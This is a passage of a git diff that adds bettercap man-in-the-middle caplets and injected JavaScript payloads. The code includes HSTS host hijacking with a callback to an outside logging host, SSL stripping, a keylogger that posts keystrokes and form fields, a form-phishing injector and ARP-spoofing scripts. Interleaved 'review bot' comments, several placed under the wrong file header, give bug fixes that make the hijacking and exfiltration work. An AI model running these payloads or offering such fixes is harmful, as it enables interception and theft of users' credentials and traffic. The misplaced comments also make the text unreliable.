"ig"), + "$1" + obf_var_replacement_string + ]; + } else if (obf_var_selector_string.match(obf_var_regex_six)) { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_seven, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"), + obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_replacement_string = 
obf_var_replacement_string.replace(obf_var_regex_six, ""); + return [ + new RegExp(obf_var_selector_string, "ig"), + obf_var_replacement_string + "$1" + ]; + } + } else { + var obf_var_selector_string = obf_var_selector_string.replace(obf_var_regex_four, "\\."), + obf_var_selector_string = obf_var_selector_string.replace(/\-/g, "\\-"); + return [ + new RegExp("^" + obf_var_selector_string + "$", "ig"), + obf_var_replacement_string + ]; + } + } + + function obf_func_parseURL(obf_var_url) { + var obf_var_strippedURL = obf_var_url.replace(/^\s*(.*)\s*$/g, "$1"), + obf_var_retval = ["","","","","",""]; + if (obf_var_strippedURL.match(/^((?:\w+:)?\/\/).*$/i)) { + obf_var_retval[0] = obf_var_strippedURL.replace(/^((?:\w+:)?\/\/).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i)) { + obf_var_retval[1] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)(?:[/][^/].*$|[/]$|[?#].*$|$)/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*/i)) { + obf_var_retval[2] = obf_var_strippedURL.replace(/^(?:(?:(?:\w+:)?\/\/)?(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))([:][1-9][0-9]{0,4}).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^(?:(?:\w+:)?\/\/(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))(?:[:][1-9][0-9]{0,4})?)?([/][^?#]*).*/i)) { + obf_var_retval[3] = obf_var_strippedURL.replace(/^(?:(?:\w+:)?\/\/)?[^/?#]*([/][^?#]*).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^.*?([?][^#]*).*/i)) { + obf_var_retval[4] = obf_var_strippedURL.replace(/^.*?([?][^#]*).*$/i, "$1"); + } + if (obf_var_strippedURL.match(/^[^#]*([#].*)/i)) { + obf_var_retval[5] = obf_var_strippedURL.replace(/^[^#]*([#].*)/i, "$1"); + } + return 
obf_var_retval; + } + + function obf_func_callback(obf_var_host) { + for ( + var obf_var_i = 0; + obf_var_i < obf_var_callback_log.length; + obf_var_i++ + ) { + if (obf_var_callback_log[i] == obf_var_host) { + return; + } + } + obf_var_callback_log.push(obf_var_host); + var obf_var_req = obf_var_XMLHttpRequest; + obf_var_req.open( + "GET", + "http://obf_random_host/obf_path_ssl_log?" + obf_var_host, + true); + obf_var_req.send(); + } + + function obf_func_hijack(obf_var_host) { + for ( + var obf_var_i = 0; + obf_var_i < obf_var_target_hosts.length; + obf_var_i++ + ) { + var obf_var_whole_regexp_set = obf_func_toWholeRegexpSet( + obf_var_target_hosts[obf_var_i], + obf_var_replacement_hosts[obf_var_i]); + if (obf_var_host.match(obf_var_whole_regexp_set[0])) { + obf_var_host = obf_var_host.replace( + obf_var_whole_regexp_set[0], + obf_var_whole_regexp_set[1]); + break; + } + } + return obf_var_host; + } + + function obf_func_hook_XMLHttpRequest() { + XMLHttpRequest.prototype.open = function( + obf_var_method, + obf_var_url, + obf_var_async, + obf_var_username, + obf_var_password + ) { + var obf_var_parsed_url = obf_func_parseURL(obf_var_url), + obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]); + if (obf_var_hijacked_host != obf_var_parsed_url[1]) { + if (obf_var_parsed_url[0].toLowerCase() === "https://") { + obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://"); + } + if (obf_var_parsed_url[2] === ":443") { + obf_var_parsed_url[2] = ""; + } + } + obf_var_url = obf_var_parsed_url[0] + + obf_var_hijacked_host + + obf_var_parsed_url[2] + + obf_var_parsed_url[3] + + obf_var_parsed_url[4] + + obf_var_parsed_url[5]; + return obf_func_open.apply(this, arguments); + } + } + + function obf_func_hook_nodes() { + document.querySelectorAll("a,form,script,iframe").forEach(function(obf_var_node){ + try { + var obf_var_url = ""; + switch (obf_var_node.tagName) { + case "A": + obf_var_node.href + ? 
obf_var_url = obf_var_node.href + : ""; + break; + case "FORM": + obf_var_node.action + ? obf_var_url = obf_var_node.action + : ""; + break; + case "SCRIPT": + obf_var_node.src + ? obf_var_url = obf_var_node.src + : ""; + break; + case "IFRAME": + obf_var_node.src + ? obf_var_url = obf_var_node.src + : ""; + break; + } + if (obf_var_url.match(/^\s*(?:http[s]?:)?\/\/[^:/?#]+/i)) { + var obf_var_parsed_url = obf_func_parseURL(obf_var_url), + obf_var_hijacked_host = obf_func_hijack(obf_var_parsed_url[1]); + if (obf_var_hijacked_host != obf_var_parsed_url[1]) { + if (obf_var_parsed_url[0].toLowerCase() === "https://") { + obf_var_parsed_url[0] = obf_var_parsed_url[0].replace(/(http)s:\/\//i, "$1://"); + } + if (obf_var_parsed_url[2] === ":443") { + obf_var_parsed_url[2] = ""; + } + } + var obf_var_hijacked_url = obf_var_parsed_url[0] + + obf_var_hijacked_host + + obf_var_parsed_url[2] + + obf_var_parsed_url[3] + + obf_var_parsed_url[4] + + obf_var_parsed_url[5]; + switch (obf_var_node.tagName) { + case "A": + if (obf_var_node.href) { + obf_var_node.href = obf_var_hijacked_url; + } + break; + case "FORM": + if (obf_var_node.action) { + obf_var_node.action = obf_var_hijacked_url; + } + break; + case "SCRIPT": + if (obf_var_node.src) { + obf_var_node.src = obf_var_hijacked_url; + } + break; + case "IFRAME": + if (obf_var_node.src) { + obf_var_node.src = obf_var_hijacked_url; + } + break; + } + obf_func_callback(obf_var_parsed_url[1].toLowerCase()); + } + } catch(obf_var_ignore) {} + }); + } + + try { + obf_func_hook_XMLHttpRequest(); + } catch(obf_var_ignore) {} + + try { + setInterval(obf_func_hook_nodes, 2000); + obf_func_hook_nodes(); + } catch(obf_var_ignore) {} + + try { + globalThis.addEventListener("load", obf_func_hook_nodes); + } catch(obf_var_ignore) {} + }); +})(); + diff --git a/hstshijack/payloads/keylogger.js b/hstshijack/payloads/keylogger.js new file mode 100644 index 0000000..2f9f00d --- /dev/null +++ b/hstshijack/payloads/keylogger.js 
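Review bot: The `XMLHttpRequest.prototype.open` wrapper installed by `obf_func_hook_XMLHttpRequest` never applies its rewrite: the file is in strict mode, so assigning the rebuilt URL to the `obf_var_url` parameter does not update `arguments`, and `obf_func_open.apply(this, arguments)` forwards the original URL unchanged. Forward an edited copy instead, `var obf_var_args = Array.prototype.slice.call(arguments); obf_var_args[1] = obf_var_url; return obf_func_open.apply(this, obf_var_args);`. Separately, `obf_func_callback` reads `obf_var_callback_log[i]` instead of `obf_var_callback_log[obf_var_i]`; in strict mode that is a ReferenceError on every call after the first, which the `try/catch` in `obf_func_hook_nodes` swallows, so only the first host is ever reported to `obf_path_ssl_log`. That function also reuses the single shared `obf_var_XMLHttpRequest` instance, so a second `open()` aborts any callback request still in flight.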
@@ -0,0 +1,141 @@ +/* + Hooks the keyup event and onsubmit events of forms and disables form autocompletion. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + + +(function(){ + "use strict"; + + var obf_var_keystrokes = []; + + function obf_func_random_string(obf_var_length) { + var obf_var_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + obf_var_buff = new Array(obf_var_length); + for (var obf_var_i = 0; obf_var_i < obf_var_length; obf_var_i++) { + obf_var_buff[obf_var_i] = obf_var_chars.charAt(parseInt(Math.random() * obf_var_chars.length)); + } + return obf_var_buff.join(""); + } + + function obf_func_callback() { + try { + var obf_var_inputs = document.getElementsByTagName("input"), + obf_var_textareas = document.getElementsByTagName("textarea"), + obf_var_params = ""; + + for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) { + if (obf_var_inputs[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + + (obf_var_i < (obf_var_inputs.length-1) ? "&" : ""); + } + } + for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) { + if (obf_var_textareas[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + + (obf_var_i < (obf_var_textareas.length-1) ? 
"&" : ""); + } + } + if (obf_var_params !== "") { + obf_var_params += "&"; + } + obf_var_params += "obf_var_keystrokes=" + encodeURIComponent(obf_var_keystrokes.join(",")); + + if (obf_var_params.length > 0) { + var obf_var_req = new XMLHttpRequest(); + obf_var_req.open( + "POST", + "http://" + location.host + "obf_path_callback?" + obf_var_params, + true); + obf_var_req.send(); + } + } catch(obf_var_ignore){} + } + + function obf_func_callback_whitelist() { + try { + var obf_var_inputs = document.getElementsByTagName("input"), + obf_var_textareas = document.getElementsByTagName("textarea"), + obf_var_params = ""; + + for (var obf_var_i = 0; obf_var_i < obf_var_inputs.length; obf_var_i++) { + if (obf_var_inputs[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_inputs[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value) + + (obf_var_i < (obf_var_inputs.length-1) ? "&" : ""); + } + } + for (var obf_var_i = 0; obf_var_i < obf_var_textareas.length; obf_var_i++) { + if (obf_var_textareas[obf_var_i].value != "") { + obf_var_params += encodeURIComponent(obf_var_textareas[obf_var_i].name) + + "=" + encodeURIComponent(obf_var_textareas[obf_var_i].value) + + (obf_var_i < (obf_var_textareas.length-1) ? "&" : ""); + } + } + + if (obf_var_params.length > 0) { + var obf_var_req = new XMLHttpRequest(); + obf_var_req.open( + "POST", + "http://" + location.host + "obf_path_whitelist?" 
+ obf_var_params, + true); + obf_var_req.send(); + } + } catch(obf_var_ignore){} + } + + function obf_func_hook_keyup() { + globalThis.addEventListener("keydown", function(obf_var_event) { + try { + obf_var_keystrokes.push(obf_var_event.key); + obf_func_callback(); + } catch(obf_var_ignore){} + }); + } + + function obf_func_hook_forms() { + document.querySelectorAll("form").forEach(function(obf_var_form){ + // if (obf_var_form.querySelector("input[type=password]")) { + // obf_var_form.addEventListener("submit", obf_func_callback_whitelist); + // } else { + obf_var_form.addEventListener("submit", obf_func_callback); + // } + }); + } + + function obf_func_hook_inputs() { + document.querySelectorAll("input").forEach(function(obf_var_input){ + obf_var_input.autocomplete = "off"; + }); + } + + var obf_var_hooked_tag = obf_func_random_string(parseInt(8 + Math.random() * 8)); + + try { + obf_func_hook_keyup(); + } catch(obf_var_ignore){} + + try { + obf_func_hook_forms(); + } catch(obf_var_ignore){} + + try { + obf_func_hook_inputs(); + } catch(obf_var_ignore){} + + try { + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_forms); + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_inputs); + globalThis.addEventListener("load", obf_func_hook_forms); + globalThis.addEventListener("load", obf_func_hook_inputs); + setInterval(obf_func_hook_forms, 2000); + setInterval(obf_func_hook_inputs, 2000); + } catch(obf_var_ignore){} +})(); + diff --git a/hstshijack/payloads/sslstrip.js b/hstshijack/payloads/sslstrip.js new file mode 100644 index 0000000..79655fd --- /dev/null +++ b/hstshijack/payloads/sslstrip.js 
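Review bot: The query-string assembly in `obf_func_callback` (and its copy in `obf_func_callback_whitelist`) produces malformed separators, because the `&` is decided by position (`obf_var_i < (obf_var_inputs.length-1)`) rather than by whether a pair was actually appended: an empty last input leaves a trailing `&`, and a non-empty last input followed by a textarea concatenates `name=value` straight onto the next pair with no separator. Collect pairs into an array and join them instead, `obf_var_parts.push(encodeURIComponent(obf_var_inputs[obf_var_i].name) + "=" + encodeURIComponent(obf_var_inputs[obf_var_i].value));` for each non-empty field, then `obf_var_params = obf_var_parts.join("&");`. Note also that `obf_func_callback` posts the full form contents on every `keydown`, which is very chatty, and that `obf_func_callback_whitelist` is dead code while the password-form branch in `obf_func_hook_forms` stays commented out. The URL is built as `"http://" + location.host + "obf_path_callback?"` with no `/` between host and path, which only works if the substituted `obf_path_callback` begins with a slash — worth confirming against the proxy module.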
@@ -0,0 +1,72 @@ +/* + Hooks XMLHttpRequest as well as 'a', 'form', 'script' & 'iframe' nodes. + + Remember that any occurrence of 'obf_path_ssl_log', 'obf_path_callback' and + 'obf_path_whitelist' in this payload will be replaced when the proxy module + loads and that variable names 'obf_var_target_hosts' and 'obf_var_replacement_hosts' + are already declared before this is injected. +*/ + +(function(){ + "use strict"; + + var obf_func_open = XMLHttpRequest.prototype.open; + + function obf_func_hook_XMLHttpRequest() { + XMLHttpRequest.prototype.open = function( + obf_var_method, + obf_var_url, + obf_var_async, + obf_var_username, + obf_var_password + ) { + var obf_var_url = obf_var_url.replace(/(http)s/ig, "$1"); + return obf_func_open.apply(this, arguments); + } + } + + function obf_func_hook_nodes() { + document.querySelectorAll("a,iframe,script,form").forEach(function(obf_var_node){ + try { + switch (obf_var_node.tagName) { + case "A": + if (obf_var_node.href && obf_var_node.href.match(/^\s*https:/i)) { + obf_var_node.href = obf_var_node.href.replace(/(http)s/i, "$1"); + } + break; + case "IFRAME": + if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) { + obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1"); + } + break; + case "SCRIPT": + if (obf_var_node.src && obf_var_node.src.match(/^\s*https:/i)) { + obf_var_node.src = obf_var_node.src.replace(/(http)s/i, "$1"); + } + break; + case "FORM": + if (obf_var_node.action && obf_var_node.action.match(/^\s*https:/i)) { + obf_var_node.action = obf_var_node.action.replace(/(http)s/i, "$1"); + } + break; + } + } catch(obf_var_ignore) {} + }); + } + + try { + obf_func_hook_XMLHttpRequest(); + } catch(obf_var_ignore) {} + + try { + obf_func_hook_nodes(); + } catch(obf_var_ignore) {} + + try { + obf_func_hook_XMLHttpRequest(); + globalThis.addEventListener("DOMContentLoaded", obf_func_hook_nodes); + globalThis.addEventListener("load", obf_func_hook_nodes); + setInterval(obf_func_hook_nodes, 4000); + 
} catch(obf_var_ignore) {} +})(); + diff --git a/http-req-dump/http-req-dump.cap b/http-req-dump/http-req-dump.cap new file mode 100644 index 0000000..18ed59f --- /dev/null +++ b/http-req-dump/http-req-dump.cap @@ -0,0 +1,27 @@ +# targeting the whole subnet by default, to make it selective: +# +# sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64" + +# to make it less verbose +# events.stream off + +# discover a few hosts +net.probe on +sleep 1 +net.probe off + +# uncomment to enable sniffing too +# set net.sniff.verbose false +# set net.sniff.local true +# set net.sniff.filter tcp port 443 +# net.sniff on + +# we'll use this proxy script to dump requests +set https.proxy.script http-req-dump.js +set http.proxy.script http-req-dump.js +clear + +# go ^_^ +http.proxy on +https.proxy on +arp.spoof on diff --git a/http-req-dump/http-req-dump.js b/http-req-dump/http-req-dump.js new file mode 100644 index 0000000..ac8e996 --- /dev/null +++ b/http-req-dump/http-req-dump.js 
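Review bot: The `XMLHttpRequest.prototype.open` wrapper in `obf_func_hook_XMLHttpRequest` is a no-op: under `"use strict"` the redeclared `obf_var_url` is not linked to `arguments`, so `obf_func_open.apply(this, arguments)` still receives the `https:` URL. Forward an edited copy instead, `var obf_var_args = Array.prototype.slice.call(arguments); obf_var_args[1] = obf_var_url.replace(/^(http)s:/i, "$1:"); return obf_func_open.apply(this, obf_var_args);`. Anchoring the pattern also stops the current `/(http)s/ig` from rewriting every `https` substring in the path or query; the node hook's unanchored `/(http)s/i` is only safe because it is guarded by the `^\s*https:` check first. `obf_func_hook_XMLHttpRequest()` is additionally invoked twice, once directly and again inside the final `try`, which is redundant.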
@@ -0,0 +1,222 @@ +var RESET = "\033[0m"; + +function R(s) { + return "\033[31m" + s + RESET; +} + +function G(s) { + return "\033[32m" + s + RESET; +} + +function B(s) { + return "\033[34m" + s + RESET; +} + +function Y(s) { + return "\033[33m" + s + RESET; +} + +function BLACK_BLUE(s) { + return "\033[104;30m" + s + RESET; +} + +function BLACK_RED(s) { + return "\033[41;30m" + s + RESET; +} + +function DIM(s) { + return "\033[2m" + s + RESET; +} + +function GREY(s) { + return "\033[30m" + s + RESET; +} + +function BOLD(s) { + return "\033[1m" + s + RESET; +} + +function dumpHeaders(req) { + headers = req.Headers.replace(/\r\n$/g, "").split("\r\n"); + + msg = "\n " + BOLD("Headers") + "\n\n"; + + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + header_value = headers[i].replace(/.*?: /, ""); + + msg += " " + G(header_name) + " => " + BOLD(header_value) + "\n"; + } + + console.log(msg); +} + +function dumpPlain(req) { + body = req.ReadBody(); + + if (req.Body.length > 0) { + console.log(" " + BOLD("Text") + "\n\n " + Y(body) + "\n"); + } +} + +function dumpForm(req) { + form = req.ParseForm(); + + if (Object.keys(form).length > 0) { + msg = " " + BOLD("Form") + "\n\n"; + + for (var key in form) { + msg += " " + B(strip(key)) + " : " + Y(strip(form[key])) + "\n"; + } + + console.log(msg); + } +} + +function dumpQuery(req) { + params = req.Query.split("&"); + + msg = " " + BOLD("Query") + "\n\n"; + + for (var i = 0; i < params.length; i++) { + param_name = params[i].split("=")[0]; + param_value = params[i].split("=")[1]; + + if (param_name != undefined && param_value != undefined && param_name.length > 0 && param_value.length > 0) { + try { + msg += " " + B(strip(decodeURIComponent(param_name))) + " : " + Y(strip(decodeURIComponent(param_value))) + "\n"; + } catch(err) { + msg += " " + B(strip(param_name)) + " : " + Y(strip(param_value)) + "\n"; + log_debug("could not decode URI parameter: " + err); + } + } else { + if 
(params[i].length > 0) { + try { + msg += " " + Y(strip(decodeURIComponent(params[i]))) + "\n"; + } catch(err) { + msg += " " + Y(strip(params[i])) + "\n"; + log_debug("could not decode URI parameter: " + err); + } + } + } + } + + console.log(msg); +} + +function dumpJSON(req) { + msg = " " + BOLD("JSON") + "\n\n"; + + var body = req.ReadBody(); + + if (req.Body.length > 0) { + try { + json = JSON.parse(body); + json_msg = JSON.stringify(json, null, 4); + + msg_lines = json_msg.split("\n"); + + for (var i = 0; i < msg_lines.length; i++) { + msg += " " + msg_lines[i].replace(/^(\s*)\{$/, "$1" + B("{")) + .replace(/^(\s*)\[$/, "$1" + B("[")) + .replace(/^(\s*)(".*?"): \{$/, "$1" + B("$2") + ": " + B("{")) + .replace(/^(\s*)(".*?"): \[$/, "$1" + B("$2") + ": " + B("[")) + .replace(/^(\s*)(".*?"): (.*?)(,$|$)/, "$1" + B("$2") + ": " + Y("$3") + "$4") + .replace(/^(\s*)(".*?")(,$|$)/, "$1" + Y("$2") + "$3") + .replace(/^(\s*)(\d*?)(,$|$)/, "$1" + Y("$2") + "$3") + .replace(/^(\s*)\](,$|$)/, "$1" + B("]") + "$2") + .replace(/^(\s*)\}(,$|$)/, "$1" + B("}") + "$2") + "\n"; + } + } catch(ignore) { + msg += " " + Y(body) + "\n"; + } + + console.log(msg); + } +} + +function dumpHex(raw) { + var DataSize = raw.length; + var Bytes = 16; + + msg = ""; + + for (var address = 0; address < DataSize; address++) { + var saddr = pad(address, 8, "0"); + var shex = ""; + var sprint = ""; + + var end = address + Bytes; + for (var i = address; i < end; i++) { + if (i < DataSize) { + shex += toHex(raw.charCodeAt(i)) + " "; + sprint += isPrint(raw[i]) ? 
raw[i] : "."; + } else { + shex += " "; + sprint += " "; + } + } + + address = end; + + msg += " " + G(saddr) + " " + shex + " " + sprint + "\n"; + } + + console.log(msg); +} + +function dumpRaw(req) { + var body = req.ReadBody(); + + if (body.length > 0) { + console.log(" " + BOLD("Body") + " " + DIM("(" + body.length + " bytes)") + "\n"); + + dumpHex(body); + } +} + +function pad(num, size, fill) { + var s = "" + num; + + while (s.length < size) { + s = fill + s; + } + + return s; +} + +function strip(s) { + return s.replace(/^\s*/, "").replace(/\s*$/, ""); +} + +function toHex(n) { + var hex = "0123456789abcdef"; + var h = hex[(0xF0 & n) >> 4] + hex[0x0F & n]; + return pad(h, 2, "0"); +} + +function isPrint(c) { + if (!c) { return false; } + var code = c.charCodeAt(0); + return (code > 31) && (code < 127); +} + +function onRequest(req, res) { + log("[" + G("http-req-dump") + "] " + BLACK_RED(req.Scheme) + " " + req.Client.IP + " " + BLACK_BLUE(req.Method) + " " + GREY(req.Scheme + "://") + Y(req.Hostname) + req.Path + (req.Query != "" ? GREY("?" + req.Query) : "")); + + dumpHeaders(req); + + if (req.Query.length > 0) { + dumpQuery(req); + } + + if (req.ContentType.indexOf("text/plain") != -1) { + dumpPlain(req); + } else if (req.ContentType.indexOf("application/x-www-form-urlencoded") != -1) { + dumpForm(req); + } else if (req.ContentType.indexOf("application/json") != -1) { + dumpJSON(req); + } else { + dumpRaw(req); + } +} diff --git a/http-ui.cap b/http-ui.cap new file mode 100644 index 0000000..bb64c8e --- /dev/null +++ b/http-ui.cap @@ -0,0 +1,15 @@ +# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1 +set api.rest.address 127.0.0.1 +set api.rest.port 8081 +set http.server.address 127.0.0.1 +set http.server.port 80 +# default installation path of the ui +set http.server.path /usr/local/share/bettercap/ui + +# !!! CHANGE THESE !!! +set api.rest.username user +set api.rest.password pass + +# go! +api.rest on +http.server on 
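Review bot: `dumpHex` silently drops one byte per row: the inner loop sets `address = end` and the `for` header then increments it again, so after the first row bytes 16, 33, 50, … are never printed. Advance by the row width in the loop header instead, `for (var address = 0; address < DataSize; address += Bytes) {`, and delete the `address = end;` line. Separately, `dumpQuery` splits each pair on `=` and keeps only `[1]`, so a value containing `=` (base64 padding, for instance) is truncated; splitting at the first `=` via `indexOf` and `slice` preserves it. The helpers also assign `headers`, `msg`, `body`, `form`, `params` and `json` without `var`, so the proxy runtime will treat them as globals shared across requests.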
diff --git a/https-ui.cap b/https-ui.cap new file mode 100644 index 0000000..81aaf3a --- /dev/null +++ b/https-ui.cap @@ -0,0 +1,21 @@ +# api listening on https://0.0.0.0:8083/ and ui on https://0.0.0.0 +set api.rest.address 0.0.0.0 +set api.rest.port 8083 +set https.server.address 0.0.0.0 +set https.server.port 443 + +# make sure both use the same https certificate so api requests won't fail +set https.server.certificate ~/.bettercap-https.cert.pem +set https.server.key ~/.bettercap-https.key.pem +set api.rest.certificate ~/.bettercap-https.cert.pem +set api.rest.key ~/.bettercap-https.key.pem +# default installation path of the ui +set https.server.path /usr/local/share/bettercap/ui + +# !!! CHANGE THESE !!! +set api.rest.username user +set api.rest.password pass + +# go! +api.rest on +https.server on diff --git a/jsinject/README.md b/jsinject/README.md new file mode 100644 index 0000000..68d1ab9 --- /dev/null +++ b/jsinject/README.md @@ -0,0 +1,25 @@ +### JS-INJECT + +A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application. + +It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and in some cases ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions. + +All you have to do is set your payload path in the caplet file. + +**jsinject/jsinject.cap** + +```sh +# Set the path to your JavaScript payload +set jsinject.payload jsinject/payloads/form-phisher.js + +set http.proxy.script jsinject/jsinject.js +set net.sniff.verbose false +net.sniff on +http.proxy on +``` + +
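Review bot: This caplet starts the REST API and the HTTPS UI on `0.0.0.0` with the placeholder credentials `user`/`pass`; the `# !!! CHANGE THESE !!!` comment is not enforced, so running the file unedited exposes a control interface with a guessable login on every interface of the host. Consider shipping it with the `api.rest on` and `https.server on` lines commented out, or at minimum binding `api.rest.address` and `https.server.address` to a specific interface, so that an operator must edit the file before anything listens. The same placeholder pair appears in `http-ui.cap`, which is less exposed only because it binds to `127.0.0.1`.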
+ +### Included payload + +form-phisher.js is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit events in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc. diff --git a/jsinject/jsinject.cap b/jsinject/jsinject.cap new file mode 100644 index 0000000..98f7dfd --- /dev/null +++ b/jsinject/jsinject.cap @@ -0,0 +1,8 @@ +# Set the path to your JavaScript payload +set jsinject.payload jsinject/payloads/form-phisher.js + +set http.proxy.script jsinject/jsinject.js +set net.sniff.verbose false +net.sniff on +http.proxy on +#arp.spoof on diff --git a/jsinject/jsinject.js b/jsinject/jsinject.js new file mode 100644 index 0000000..3fc2325 --- /dev/null +++ b/jsinject/jsinject.js 
@@ -0,0 +1,51 @@ +var session_id, + payload, + payload_path, + payload_container = "" + + "if (!self.{{session_id}}) {\n" + + "var {{session_id}} = function() {\n" + + "{{payload}}\n" + + "}\n" + + "{{session_id}}();\n" + + "}\n" + +var green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function randomString(length) { + var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + buffer = "" + while (buffer.length < length) { + index = parseInt( Math.random() * chars.length ) + buffer = buffer + chars.charAt(index) + } + return buffer +} + +function configure() { + payload_path = env["jsinject.payload"].replace(/\s/g, "") + payload = readFile(payload_path) + payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id) +} + +function onLoad() { + session_id = randomString( 4 + parseInt( Math.random() * 16 ) ) + configure() + log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.") + log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".") +} + +function onResponse(req, res) { + configure() + if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) { + res.ReadBody() + log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...") + res.Body = res.Body.replace(//i, "") + } + if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) { + res.ReadBody() + log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...") + res.Body = payload + res.Body + } +} diff --git a/jsinject/payloads/form-phisher.js b/jsinject/payloads/form-phisher.js new file mode 100644 index 0000000..43b24c9 --- /dev/null +++ b/jsinject/payloads/form-phisher.js 
@@ -0,0 +1,35 @@ +var hooked = false + +function callback() { + var inputs = document.getElementsByTagName("input"), + textareas = document.getElementsByTagName("textarea"), + params = "" + for (var i = 0; i < inputs.length; i++) { + if (inputs[i].value != "") { + params = params + inputs[i].name + "=" + inputs[i].value + ( i < (inputs.length-1) ? "&" : "" ) + } + } + for (var i = 0; i < textareas.length; i++) { + if (textareas[i].value != "") { + params = params + textareas[i].name + "=" + textareas[i].value + ( i < (textareas.length-1) ? "&" : "" ) + } + } + if (params.length > 0) { + req = new XMLHttpRequest() + req.open("POST", "http://" + location.host + "/bettercap_sniffer_callback?" + params, true) + req.send() + } +} + +self.addEventListener("keydown", function(event) { + (event.key == "Enter" || event.keyCode == 13) ? callback() : "" + if (hooked == false) { + self.addEventListener("click", callback) + self.addEventListener("touchend", callback) + forms = document.querySelectorAll("form") + for (var i = 0; i < forms.length; i++) { + forms[i].addEventListener("submit", callback) + } + hooked = true + } +}) diff --git a/local-sniffer.cap b/local-sniffer.cap new file mode 100644 index 0000000..c9c82b1 --- /dev/null +++ b/local-sniffer.cap @@ -0,0 +1,11 @@ +#events.stream off +events.clear +# set events.stream.filter net.sniff +# events.stream on + +set net.sniff.verbose false +set net.sniff.local true +# https://biot.com/capstats/bpf.html +# set net.sniff.filter not arp and not udp port 53 + +net.sniff on diff --git a/login-manager-abuse/login-man-abuse.cap b/login-manager-abuse/login-man-abuse.cap new file mode 100644 index 0000000..cf1bb78 --- /dev/null +++ b/login-manager-abuse/login-man-abuse.cap 
@@ -0,0 +1,12 @@
+# targeting the whole subnet by default, to make it selective:
+#
+# sudo ./bettercap -caplet login-man-abuse.cap -eval "set arp.spoof.targets 192.168.1.53"
+
+set http.proxy.script login-man-abuse.js
+http.proxy on
+sleep 1
+arp.spoof on
+
+
+
+
diff --git a/login-manager-abuse/login-man-abuse.js b/login-manager-abuse/login-man-abuse.js
new file mode 100644
index 0000000..a9c0b89
--- /dev/null
+++ b/login-manager-abuse/login-man-abuse.js
